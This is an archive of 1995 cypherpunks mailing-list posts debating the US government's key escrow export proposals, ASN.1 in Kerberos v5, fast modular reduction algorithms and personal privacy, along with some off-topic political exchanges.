hr.house.gov Subject: Industry Slams Gov's Encryption Export Plan I was at the 9/6 NIST session and this account is reasonably accurate. Even though a seemingly high percentage of attendees indicated displeasure with current Administration key escrow proposals, they seem hell bent on this path. Further, the sense was that industry representatives were basically invited as a simple window dressing maneuver. The engaging Whitfield Diffie of Sun Microsystems did an outstanding job of raising questions about the Administration's proposal. Today's session--"Desirable Characteristics for Key Escrow Agents." Jim Rapp, "give me more info" CyberStrategies Alexandria, Virginia Via Newsbytes, Kennedy Maize 9/6/95 12:00 a.m. WASHINGTON, D.C., -- The Clinton administration's new proposal on export controls onencryption in software got a tongue lashing from the software industry today. The administration's announcement of a so-called liberalization "suggests that the government is pursuing a 'son of Clipper' strategy that could lead to the mandatory use of government designed key escrow encryption," said Robert Holleyman, president of the Business Software Alliance. Speaking at a conference sponsored by the National Institute of Standards and Technology, Holleyman said the administration plan to allow export only if the encryption scheme involves key escrow reveals "a misunderstanding of the marketplace and unless significantly changed, will prevent key escrow encryption from ever being commercially adopted." The White House initiative, Holleyman said, "failed to provide immediate relief to software companies because it did nothing to liberalize export controls on generally available software employing non-key escrow encryption. "Each delay by the administration in permitting the export of software with strong encryption capabilities results in lost sales for American companies," said Holleyman. "Ironically, foreign software competitors, unconstrained by export controls, continue to fill this void, with more than 200 foreign encryption programs available from 21 countries." Under the new administration proposal, software companies that employ non-key escrow encryption would continue to be limited to a 40-bit key. Holleyman called for the administration to immediately permit 56-bit encryption without key escrow, which he said is the current world standard. Last year, the administration was pushing a hardware-software approach to encryption, called the Clipper chip, which would have employed government-designated escrow agents to hold keys. Law enforcement agencies would have been able to get access to the keys from the escrow agents. Of the administration proposal to loosen controls on key escrow encryption, Holleyman said that "the administration's inability to shake off the Clipper mind-set is effectively precluding the adoption of realistic criteria for commercial key recovery systems." Holleyman suggested that a workable system must include strong encryption where users -- in the US and elsewhere -- are able to specify the key holder. Current administration policy, Holleyman said, is jeopardizing the "future of the global information infrastructure and electronic commerce. Instead of paving the roads, the administration has left in place roadblocks on the information highway." --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From aba at dcs.exeter.ac.uk Thu Sep 7 12:42:21 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Thu, 7 Sep 95 12:42:21 PDT Subject: GAK Hacks Message-ID: <8921.9509071941@exe.dcs.exeter.ac.uk> Tim May writes on cpunks: > We did it for SSL, let's do it for GAK. > > Demonstrate that superencryption (encrypting within a GAK wrapper) defeats > GAK. And other kinds of hacks, including releasing "damaged" (inoperative) > versions of the proposed code (when it becomes available). I was just drooling over the fun to be had if and when this crap goes through. Surely a very fun thing to do. A new legit hobby for all those games crackers out there. (Hmm maybe not so legit, micro$oft has non- reverse engineering clauses on their stuff, but that doesn't stop anyone, and there's always remailers). One of their requirements was resistance to static patches, as someone else pointed out that is just not possible in software, if some gets really bored they can at worst disassemble the entire thing, and re-write it from scratch without any silly GAK stuff, or with a row of 00s where the escrowed key goes. > Or releasing "work-alikes." Etc. > > Granted, the demonstrations will be less clear than breaking the 40-bit key > was, partly because there is no clear-cut standard out there, and many > aspects of GAK are still in flux. > > But it could still be a powerful example, an example "by direct > demonstration," that government-mandated key escrow is problematic. > > (Of course, a sufficiently powerful or clear demonstration, picked up by > the popular press the way the SSL challenge was, could also cause the > government to tighten up the rules on GAK, such > as--speculatively!!!!--adding "compliance audits" to the GAK laws.) So the question is what do you prefer: 40 bits only or 64 bits which can be broken? Is it worth sabotaging what is essentially an impossible task open to having the GAK element hacked out? It would be much more fun if they'd agree to no limits on key sizes, and GAK. What happens if the result of the talks which Pat Farrell kindly described is that it is impossible? What is their next move? We've had "voluntary" hard-ware key-escrow, and it got chucked out by widespread derision of the idea, now the same in software. Which direction does the next phased attack come from? > But GAK Hacking could be an interesting project. indeed. Adam From baldwin at RSA.COM Thu Sep 7 12:51:50 1995 From: baldwin at RSA.COM (baldwin (Robert W. Baldwin)) Date: Thu, 7 Sep 95 12:51:50 PDT Subject: Commercial Speech over Internet product Message-ID: <9508078105.AA810503582@snail.rsa.com> Here's an article about a commercial company that is doing speech over the Internet. Maybe someone would like to help them add encryption. --Bob Baldwin, speaking for myself only. ------------------------ TrueSpeech Player enables real-time audio over Internet SANTA CLARA, CALIFORNIA, U.S.A., 1995 SEP 1 (NB) -- DSP Group Inc. (NASDAQ:DSPG) announced a new Windows product, TrueSpeech Player, that is freely available on the Internet. The TrueSpeech Player enables TrueSpeech- encoded speech to be played in real-time over the Internet. Kurt Magdanz, director of business development at DSP, told Newsbytes, "The TrueSpeech Player utilizes the TrueSpeech compression technology bundled in Microsoft's Windows 95 and Windows NT. True Speech is a very high quality algorithm which compresses speech. TrueSpeech Player allows users to decompress TrueSpeech in real time." With the TrueSpeech compression algorithm, speech is communicated in real- time over standard telephone lines to computers capable of communicating at data rates of 14.4kbps (kilobits per second) or above, Newsbytes was told. Because the TrueSpeech Player converts compressed speech data in real-time, World Wide Web site visitors have access to high-quality speech over the Internet in real time, said Magdanz. "The TrueSpeech Player is our first step in enabling high-quality speech communication in real-time over the Internet," said Yuval Cohen, vice president of business development with the DSP Group. "World Wide Web site and content developers can immediately begin developing TrueSpeech Player- compatible content without paying fees." "Content developers who wish to create TrueSpeech Player-compatible speech content should visit our World Wide Web site for detailed instructions on how to use this new product," said Cohen. DSP Group is currently developing an advanced TrueSpeech Server software package which will offer content developers tools, interaction with the TrueSpeech Player to enable advanced features, live broadcasting capability and enhanced server control with diagnostics, said Magdanz. The TrueSpeech Player can be downloaded freely from DSP Group's World Wide Web site, http://www.dspg.com . DSP is headquartered in Santa Clara, California. (Richard Bowers/19950831/Press Contact: Kurt Magdanz, DSP, 408- 986-4300) From pfarrell at netcom.com Thu Sep 7 13:02:32 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Thu, 7 Sep 95 13:02:32 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: <199509071959.MAA11919@netcom3.netcom.com> >"If keys are escrowed, what purpose does a 64 bit limit serve?" This question was asked, it seems like a zillion times, but probably no more than four or five times. It is a bit of a belt and suspenders idea. But it also shows how scared they are about real encryption. It is clear that this meeting is a shame. Everyone in industry says it won't be marketable. The Govies say it will be great. What they really want is to force weak crypto on the US by forcing the vendors to make a weak product "for export" when all the vendors say that they have to have _only one_ version. If they have one version, and it is weak, we are safe from drug dealers, pedophiles and terrorists. (BTW, I'm used that phrase yesterday, so it should be in the Federal register's offical record.) >Secondarily, I observe that this apparently precludes the use of OTP. No, they don't care about the cipher, only the key length, But with a 64bit, GAK'd key, you can't say much without repeating the P, and that makes it a TTP or a FTP (two time pad, or four time pad) which isn't very useful. You probably can gzip "attack at dawn" to 64 bits, but not much more. Pat Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrellA Infor. Systems and Software Engineering, George Mason University, Fairfax, VA PGP key available via finger or request #include standard.disclaimer Z~v :$ From cman at communities.com Thu Sep 7 13:10:00 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 7 Sep 95 13:10:00 PDT Subject: GAK Message-ID: One good (non-cypherpunk) argument against GAK is that it concentrates a very large quantity of valuable keys in a few places, where they become an extremely attractive target for government or corporate espionage. You could compare this to the function served by banks, but banks tend to notice fairly quickly when money is missing. Compromising keys doesn't involve removing anything, or throw the books out of balance; they just get copied. The compromise is only revealed if they are used clumsily. Note that a few million keys would fit very easily on even a low-end DAT tape (easily hidden in a pack of cigarettes). From trei at process.com Thu Sep 7 13:42:48 1995 From: trei at process.com (Peter Trei) Date: Thu, 7 Sep 95 13:42:48 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: <9509072042.AA20013@toad.com> > >"If keys are escrowed, what purpose does a 64 bit limit serve?" > This question was asked, it seems like a zillion times, but > probably no more than four or five times. > It is a bit of a belt and suspenders idea. But it also shows how > scared they are about real encryption. Is there an actual quote - did an identifiable government person actually use the 'belt and suspenders' line? This is getting to the point where journalists could have something to hang a story on. I think we can infer from this that the USG has, or soon expects to have, the ability to brute 64 bits of key. > It is clear that this meeting is a shame. Everyone in industry ^^^^^^^^ A shame certainly, but I suspect you meant 'sham' (not a spelling flame, the difference in meaning is important). > Pat > Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From frissell at panix.com Thu Sep 7 13:47:08 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Sep 95 13:47:08 PDT Subject: Collection of personal info Message-ID: <199509072046.QAA26704@panix.com> At 02:46 PM 9/7/95 -0400, dmandl at panix.com wrote: >> And once the interface improves... > >...I won't have to deal with the inefficiencies of real sex, live >music performances, or (non-virtual) world travel ever again. > >> Actually, the creation of separate "spaces" that can only be entered with >> your (each person's) permission will have a big impact on life in the real >> world. Dave. Sorry you didn't catch the implied change of tone in the above. I meant to show a switch from Space Cadet rhetoric about the nets to a more realistic view. >> And once the interface improves... >> Actually, the creation of separate "spaces" that can only be entered with >> your (each person's) permission These separate spaces won't wipe out the Real World (used with permission) but they will influence it as a form of private property that is self enforcing neither dependent on force for protection nor capable of being penetrated by force. This is a BIG THING. You can't live in it yet but you will certainly be able to trade digital goods and services there and stash digital goods (work product, databases, etc.). Having a place that is under your exclusive control has enormous practical and psychological implications. Think of the change that occurred when peasants came to be able to own land. Cyberspace contains spaces that can be cheaply created, individually owned, and free of confiscation. And since the bulk of the wealth of OECD countries is non-physical (consisting of various forms of ownership rights and "choses in action") that wealth can be protected cryptographically. >I've got to tell you, Duncan, this kind of rhetoric pushes me over to >the luddite side more every day. > >No flame intended--just one man's opinion. Don't you like the idea of a "place" that's yours alone? It's not dangerous (to you). It increases your choices. Your power. DCF "You don't have to be nice to nation states you meet on the way up if you're not coming back down." From alanh at infi.net Thu Sep 7 13:52:40 1995 From: alanh at infi.net (Alan Horowitz) Date: Thu, 7 Sep 95 13:52:40 PDT Subject: Are booby-trapped computers legal? In-Reply-To: <199509060419.XAA04296@einstein.ssz.com> Message-ID: I am pretty sure that it is lawful to use deadly force to protect property, in New Mexico. From tytso at MIT.EDU Thu Sep 7 15:25:19 1995 From: tytso at MIT.EDU (Theodore Ts'o) Date: Thu, 7 Sep 95 15:25:19 PDT Subject: Kerberos v5's experience with ASN.1 In-Reply-To: <9509071925.AA17839@toad.com> Message-ID: <9509072225.AA26823@dcl.MIT.EDU> -----BEGIN PGP SIGNED MESSAGE----- To: Cypherpunks Lite Date: Sat, 2 Sep 1995 13:55:38 -0400 From: jis at mit.edu (Jeffrey I. Schiller) However, the problem with ASN.1 isn't its waste of space (which actually isn't that bad for a mechanism for encoding arbitrary objects). While I won't argue about the rest of Jeff's note about the use of ASN.1 being a mistake, I do want to point out that certain ASN.1 types are in fact very wasteful of space. Most notable of these is the ASN.1 Generalized Time --- which encodes the a timestamp in ASCII. ASN.1 GeneralizedTime therefore requires 17 bytes to encode, an over four-fold increase in the amount of space needed to store a time, compared with a 4 byte representation of "number of seconds since 1970". This is deadly in a protocol which has to store lots of timestamps, which is the case in Kerberos V5. We could have gotten around this problem by merely storing an integer whenever we needed to store a timestamp, instead of using the ASN.1 abstract type. Then it would have only taken 6 bytes (ASN.1 adds a 2-byte overhead for each object which you store). - Ted -----BEGIN PGP SIGNATURE----- Version: 2.6.1 Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface iQCVAwUBME9xO0QVcM1Ga0KJAQGiQwQAhSu4WpeVZ+hsN+o+NvWMwP8JK0GojhuI vWE1M3iIZttz4iMEbsziZ1KzWlkFTL8AKVWkzDAZ8t5lNMis9qObCfaQPQkKTLwJ UV20GjebckOzFx7Rp9OPDDI536cepvcjFN0cQkWtmiW2KP04TU9zr4caD4cfozDJ XYGZavYmpBQ= =9YUm -----END PGP SIGNATURE----- From terrell at sam.neosoft.com Thu Sep 7 15:52:29 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Thu, 7 Sep 95 15:52:29 PDT Subject: GAK Message-ID: <199509072302.SAA02407@sam.neosoft.com> >Date: Sun, 3 Sep 1995 21:25:26 -0400 (EDT) >From: Brian Davis >Subject: Re: GAK >On Fri, 1 Sep 1995, Timothy C. May wrote: > >> At 10:56 PM 9/1/95, Buford Terrell wrote: >> >> >If you've ever watched Not_at_all_Funny Home Videos or any of the >> >American Urinal school of tabloid television, you soon start feeling >> >that the real threat to privacy is not the guvmint, but all of >> >the yoyos with their little cam corders running around pointing them >> >at people. >> > >> >Security cameras in ATMS and at airline ticket counters do more >> >to threaten you privacy than do FIBBIE wiretaps, and PGP won't >> >protect you from them. (and usually neither will the courts). >> >> I absolutely agree with this, though this doesn't mean I'll stop worrying >> about the government's plans for key escrow (GAK), about limits on key >> lengths, or about other efforts to thwart strong security. > >I, of course, know of the "dislike" of GAK here. I am curious to know, >however, if the "dislike" is because government would have access under >any circumstances or if the primary worry is that government will cheat >and get access when most would agree that they shouldn't (either by the >judge "cheating" or a TLA stealing it). > >In other words ... if it took agreement by a review board composed of >non-LEA members of this list, would the escrow be acceptable?? > >EBD > In my case, it's simply a matter of principle: the government has no right to know what I'm saying. Search warrants may allow them to get to "things" that I have, but the First and Fifth amendments make words sacred. If the government can eavesdrop on my conversation, then my speech is no longer free. A review board consisting of cypherpunks has no more right to listen to my private conversations than does the FBI, so I would not agree to that proposal either. --buford From cme at TIS.COM Thu Sep 7 16:09:15 1995 From: cme at TIS.COM (Carl Ellison) Date: Thu, 7 Sep 95 16:09:15 PDT Subject: ASN.1 and Kerberos version 5 In-Reply-To: <199509071800.LAA20586@comsec.com> Message-ID: <9509072233.AA03587@tis.com> >Date: Sat, 2 Sep 1995 13:55:38 -0400 >From: jis at mit.edu (Jeffrey I. Schiller) >I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos >version 5. I had this disease at the time that made me think that ASN.1 was >a good idea. I got better, unfortunately we have been living with the >results of my braino for quite some time now... poor Ted. Jeff, I'm collecting lists of ASN.1 problems as well as better solutions. If you'd care to contribute.... Otherwise, I'll post the results when they're firmed up. I got some *great* material from Burt Kaliski at the P1363 meeting and that needs to be folded in, so I know it's not soup yet. - Carl From weidai at eskimo.com Thu Sep 7 16:47:38 1995 From: weidai at eskimo.com (Wei Dai) Date: Thu, 7 Sep 95 16:47:38 PDT Subject: fast modular reduction In-Reply-To: <199509070811.EAA07559@clark.net> Message-ID: > Anyway, I played around with the algorithm a little, and it's neat > and easy to implement, but the speed increase is not worth > the patent hassle (assuming there is a speed increase, I saw none) > > The algorithm is still basically O(n^2) if used in a modexp > routine. It requires n^2 multiplications and additions. Whereas, > a typical Karatsuba multiplication using a high precision > reciprocal will only use 2*n^1.5 multiplications and 5*n^1.5/8 > additions. (for n=64 which is a 2048-bit number being reduced, > it's about 1/5 the multiplications, but 5 times the additions) I agree with you that the patent hassle is probably not worth the speed increase. If I came up with the algorithm by myself and on my own time, I certainly would not have filed a patent for it, but that wasn't the case. I also agree that the patent system should be abolished, but there is nothing I can do about that either. The speed increase does exist over Montgomery's modular reduction because it uses n*n multiplications and 1 division compared to n*(n+1) multiplications, and the pre- and post-calculations are much simpler. Division using Karatsuba multiplication does seem to have a better asymptote, but is probably slower for most practical lengths. Both Lenstra's LIP and Lacy's CryptLib use Montgomery for modular reduction. The numbers you give are a bit off. Assuming a 32-bit machine, n=64 implies a 2048-bit modulus, and a 4096-bit number to be reduced. Also, Karatsuba should use 1/3 (2*64^1.58 / 64^2) the multiplications rather than 1/5. Wei Dai From hallam at w3.org Thu Sep 7 17:14:46 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 7 Sep 95 17:14:46 PDT Subject: GAK Hacks In-Reply-To: <8921.9509071941@exe.dcs.exeter.ac.uk> Message-ID: <9509080010.AA06896@zorch.w3.org> >One of their requirements was resistance to static patches, as someone >else pointed out that is just not possible in software, if some gets >really bored they can at worst disassemble the entire thing, and >re-write it from scratch without any silly GAK stuff, or with a row of >00s where the escrowed key goes. I think I would prefer the escrowed key to a row of 00's, if someone wanted to use decode the message they could just use the all 00's key :-) Phill From starrd at iia2.org Thu Sep 7 17:27:16 1995 From: starrd at iia2.org (starrd) Date: Thu, 7 Sep 95 17:27:16 PDT Subject: Collection of personal info In-Reply-To: Message-ID: On Wed, 6 Sep 1995, Rob Lowry wrote: > I am new to the crypto scene and still think PGP is neato ;) Welcome, you will learn a lot of great material here, and yes it is neato. I just wish it came pre-installed with WinDoze... ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From dr261 at cleveland.Freenet.Edu Thu Sep 7 17:32:47 1995 From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke) Date: Thu, 7 Sep 95 17:32:47 PDT Subject: Collection of personal info Message-ID: <199509080005.UAA26943@kanga.INS.CWRU.Edu> >letting it happen, and using cash instead of credit, is the smart answer I'm somewhat surprized at how much of an issue this is. The federal government prints up nice green paper for us to pay for things with. It's annonymous (to a large extent), univerally accepted (most of the time), fairly untracably (unless you really want to), easily available, doesn't collect interest, free to use, etc. No one is forcing anyone to use credit cards, etc.. Then again, being a kid, I have never bought anything with anything other than cash on the spot... -- Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142 dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido From starrd at iia2.org Thu Sep 7 17:33:13 1995 From: starrd at iia2.org (starrd) Date: Thu, 7 Sep 95 17:33:13 PDT Subject: ON OFF-TOPIC In-Reply-To: <199509070639.BAA00416@mail.socketis.net> Message-ID: On Wed, 6 Sep 1995, Gary Jeffers wrote: > Date: Wed, 06 Sep 1995 22:42:42 -0500 > From: Gary Jeffers > To: cypherpunks at toad.com > Subject: ON OFF-TOPIC > > ON OFF-TOPIC > > THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY! > > > CRYPTO CODERS SUPPLY THE MEANS! > CONSPIRACY THEORISTS SUPPLY THE MOTIVATION! > > > conspiracy theorist = alternative political theorist > NOT= AP/ABC/CBS/NBC/CIA/FBI/U.S GOV'N./New York Times/Washington Post > opinion moulders syndicate > > "extremist right-wing kook" = old fashioned American patriot > Left term used often by left-wing extremist liberal statist kooks. > > The United States "Federal" Government - we'll be even more American > without it. > > > > PUSH EM BACK! PUSH EM BACK! > WWWAAAYYYY BBBAAACCCK! > BBBEEEAAATTTT STATE! >  > So true my friend, I have been saying this for years. Glad to find another patriot here. BTW, I love your cheer! ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From starrd at iia2.org Thu Sep 7 17:41:47 1995 From: starrd at iia2.org (starrd) Date: Thu, 7 Sep 95 17:41:47 PDT Subject: ON OFF-TOPIC In-Reply-To: <199509070834.EAA04213@frankenstein.piermont.com> Message-ID: On Thu, 7 Sep 1995, Perry E. Metzger wrote: > > Was this really needed? Yes, it is my bet that there are some patriots in this list. The desire to protect one's privacy is a very "patriot" thiung to want to do. CyPherpunks appears to be a lot of peole who are against big brothert government, and quite probably for restoring the constitution...am I right? > > Gary Jeffers writes: > > ON OFF-TOPIC > > > > THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY! > ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From mnorton at cavern.uark.edu Thu Sep 7 17:42:17 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Thu, 7 Sep 95 17:42:17 PDT Subject: Collection of personal info In-Reply-To: Message-ID: a sonewhat similar system does exist, also unser federal statute, for credit reporting agencies. YMMV MacN On Wed, 6 Sep 1995, Rob Lowry wrote: > > > Nor was I suggesting a legal solution (I know your comment > > was triggered by Rob's request for legal recourse) but instead > > suggesting that things are farther along than some people realize. > > Nor do I support additional rules/laws or regulations.. but if there are > existing ones to screw with, use 'em.. > Recently I had a bill turned over to collections from, of all places, the > daycare we used to take our kids too.. we owe them about $1300 in their > estimation. The reason we have not paid is due to 11 days of lost work > due to head lice that they provided to my kids, plus they stopped serving > breakfast which was in the contract we signed when enrolling the kids there.. > I was notified by the collection co. about this submittal (now $1500 for > some reason..) and by law, I can dispute this in writing, thus slowing > the wheels of the collection monster horribly. I did so.. and for the > last 4 months, they have been trying to prove I owe money.. I was asking > if such a system exist for the release of your credit info.. and it > appears that there is no safety mechanism in that monster. Rather than > cry out for more laws to be twisted against us later, I agree that > letting it happen, and using cash instead of credit, is the smart answer > here. > > Someone care to point me at e-cash info? sounds interesting.. remember, > I am new to the crypto scene and still think PGP is neato ;) > > > From rjc at clark.net Thu Sep 7 17:49:09 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 7 Sep 95 17:49:09 PDT Subject: fast modular reduction In-Reply-To: Message-ID: <199509080048.UAA19561@clark.net> > > The numbers you give are a bit off. Assuming a 32-bit machine, > n=64 implies a 2048-bit modulus, and a 4096-bit number to be reduced. > Also, Karatsuba should use 1/3 (2*64^1.58 / 64^2) the multiplications > rather than 1/5. The n=64 implies two 2048-bit numbers are being multiplied. The 2048-bit number comes from the fact that in a typical crypto app, modexp will be reducing numbers as large as the modulus squared which runs 2048-bits for a 1024-bit modulus. The reciprocal is 1 block bigger than the number to be reduced. Hence, you are dealing with multiplying about two 2048-bit numbers. But since we only care about the "fractional" part of the result, we can safely throw away half the computation and only compute half the Karatsuba recursion tree. (the number before the decimal point is the quotient) Then, to determine the final remainder, we simply multiply by the modulus again, throwing away non-significant computation again. There is a normal n^2 method for reducing via reciprocal that only uses 1/4 the number of ops as the obvious technique. Your right about the 1/3 vs 1/5, I dunno where the 5 came from, must have been a typo in my calcs. The problem with Karatsuba is that it's hard to implement efficiently. Temporary ints should be kept to a minimum and be preallocated. The combine step requires 1 store, and 5 additions, of multiprecision integers. The split step requires no copying if you use pointer manipulation, and instead of shifting, don't add in place, but add "with shift" to the destination. Most of the implementations I've seen do too much copying and shifting. Given that some modern processors have efficient hardware multiply, it might not be worth all the trouble to trade mults for adds. If a processor has an efficient hardware FFT, it might even be worthwhile to use the FFT multiply method. Do you have a ref for the Montgomery method? I'm unfamilar with the name, I wonder if it's something I've seen before under a different label. Check out Schonhage's book "Fast Algorithms" They've implemented all the asymtotic algorithms efficiently and gathered performance data. I corresponded with Schonhage's grad student and he told me that Karatsuba wins for n>=8, which I find difficult to see, when it takes about n=32 for my own implementation (not optimized) to break even. -Ray From tcmay at got.net Thu Sep 7 17:50:22 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 17:50:22 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: At 7:59 PM 9/7/95, Pat Farrell wrote: >>"If keys are escrowed, what purpose does a 64 bit limit serve?" > >This question was asked, it seems like a zillion times, but >probably no more than four or five times. > >It is a bit of a belt and suspenders idea. But it also shows how >scared they are about real encryption. > >It is clear that this meeting is a shame. Everyone in industry ^^^^^ Sham? Or shame? Or, likely, both? Your account of the meeting merely confirms my worst fears. But don't they say the Chinese character for "crisis" also means "opportunity"? (Sort of the way the English word "oversight" has two very different and opposite meanings.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jya at pipeline.com Thu Sep 7 17:55:55 1995 From: jya at pipeline.com (John Young) Date: Thu, 7 Sep 95 17:55:55 PDT Subject: Key Escrow Papers Message-ID: <199509080055.UAA27687@pipe4.nyc.pipeline.com> We have scanned several of the handouts at the NIST Key Escrow Issues Meeting of September 6 (not present Sept 7). Perhaps someone, Pat Farrell or another, would be willing to make them available on a homepage or ftp site. If so we will send them over. If nobody volunteers we will send them by our puny e-mail contraption. Here's what we have ready to send: 1. The outlines of meeting topics of Raymond Kammer of NIST and Michael Nelson of the White House. (7kb) 2. Discussion Paper No. 4, "Example Potential Solutions for the Draft Export Criteria for Software Key Escrow Encryption," which offers example solutions for each of the ten criteria. (7kb) 3. The Business Software Alliance's dissenting blast at the government's key escrow proposal and export limit. This paper was loudly applauded. (19kb) 4. Trusted Informations Systems's "Thoughts on the NIST Escrow Issues Meeting Discussion Papers." (27kb in 2 parts) 5. TECSEC Incorporated's "Private Escrow Key Management: A Method and its Issues." (13kb) 6. Dorothy Denning's "Comments on Draft Criteria for Software Key Escrow Exportability" and "Comments on Issues for Key Escrow Agents." (8kb) Two other papers will be scanned later: 7. National Semiconductor's "Commercial Cryptography Ideas for Success" (9 pp. of large type) This contains graphics of the CAKE program and a "Proposed NIST Escrow Certificate Heirarchy" which cannot be easily distributed by us, so we offer this by fax. 8. TECSEC's "The Merger of Technology and Cryptographic Key Management" (6 pp.). Note 1: It was Michael Nelson of the White House who said that the reason to maintain the 64-bit limit for export was because the key escrow methodology had not yet been proven reliable and that the security agencies insisted on the relatively weak system in case key escrow failed. Note 2: At the B-2 breakout session there was strong debate on a proposal for a "Criteria Zero": Before addressing any of the details of Criteria 3, 4 and 9 as presented to us, Group B-2 registers its view that export under general license of strong encryption should not require key escrow. A vote on the proposal was 7 yes, 7 no and 13 absentions. It was not reported to the plenary session. From perry at piermont.com Thu Sep 7 17:57:56 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 7 Sep 95 17:57:56 PDT Subject: ON OFF-TOPIC In-Reply-To: Message-ID: <199509080057.UAA05313@frankenstein.piermont.com> starrd writes: > On Thu, 7 Sep 1995, Perry E. Metzger wrote: > > > > Was this really needed? > > Yes, it is my bet that there are some patriots in this list. Pardon, but I don't care. There are also several socialists on this list. Shall I help them out by posting a long tract on the labor theory of value? There are several religious christians here. Shall we begin to discuss the divinity of Jesus? There are also some Jews here -- we could have a bunch of religious debates, and the atheists could kick in some mud, too. There are lots of folks here who wear shoes -- perhaps we could discuss the merits of different brands. > The desire > to protect one's 